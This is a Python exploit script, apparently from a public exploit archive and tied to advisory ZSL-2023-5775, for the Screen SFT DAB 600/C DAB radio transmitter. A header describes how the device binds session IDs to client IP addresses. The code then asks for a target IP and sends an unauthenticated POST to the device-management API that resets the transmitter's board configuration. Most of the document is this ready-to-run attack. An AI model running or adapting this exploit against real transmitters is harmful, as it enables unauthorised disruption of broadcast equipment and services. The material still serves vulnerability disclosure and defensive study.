#!/usr/bin/env python3## Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Reset Board Config# Exploit Author: LiquidWorm### Vendor: DB Elettronica Telecomunicazioni SpA# Product web page: https://www.screen.it | https://www.dbbroadcast.com# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/# Affected version: Firmware: 1.9.3# Bios firmware: 7.1 (Apr 19 2021)# Gui: 2.46# FPGA: 169.55# uc: 6.15## Summary: Screen's new radio DAB Transmitter is reaching the highest# technology level in both Digital Signal Processing and RF domain.# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the# digital adaptive precorrection and configuatio flexibility, the Hot# Swap System technology, the compactness and the smart system design,# the SFT DAB are advanced transmitters. They support standards DAB,# DAB+ and T-DMB and are compatible with major headend brands.## Desc: The application suffers from a weak session management that can# allow an attacker on the same network to bypass these controls by reusing# the same IP address assigned to the victim user (NAT) and exploit crucial# operations on the device itself. By abusing the IP address property that# is binded to the Session ID, one needs to await for such an established# session and issue unauthorized requests to the vulnerable API to manage# and/or manipulate the affected transmitter.## Tested on: Keil-EWEB/2.1#MontaVista® Linux® Carrier Grade eXpress (CGX)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# @zeroscience### Advisory ID: ZSL-2023-5775# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5775.php### 19.03.2023#import hashlib,datetime##########import requests,colorama#########from colorama import Fore, Style#
colorama.init()print(Fore.RED+Style.BRIGHT+'''
█████████████ ██████ ██ █████ █████████████ ██████
██ ██ ██████████ ██ ████ ██ ██ ██ ████ ██
███████████ ██ ████ ██ ██ ██ ████ ██ ██ █████ ██████
██ ██ ████████ ██ ████ ██ ██ ██ ████ ██
██ ██ ███████ ████ ██ ██ ████ █████████████ ██ ██
'''+Style.RESET_ALL)print(Fore.WHITE+Style.BRIGHT+'''
ZSL and the Producers insist that no one
submit any exploits of themselfs or others
performing any dangerous activities.
We will not open or view them.
'''+Style.RESET_ALL)
s=datetime.datetime.now()
s=s.strftime('%d.%m.%Y %H:%M:%S')print('Starting API XPL -',s)
t=input('Enter transmitter ip: ')
e='/system/api/deviceManagement.cgx'print('Calling object: ssbtObj')print('CGX fastcall: deviceManagement::reset')
t='http://'+t+e
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8','Accept':'application/json, text/plain, */*','Accept-Language':'ku-MK,en;q=0.9','Accept-Encoding':'gzip, deflate','User-Agent':'Dabber--','Connection':'close'}
j={'ssbtIdx':0,'ssbtType':'deviceManagement','ssbtObj':{'reset':'true'}}
r=requests.post(t,headers=bh,json=j)if r.status_code==200:print('Done.')else:print('Error')
exit(-1)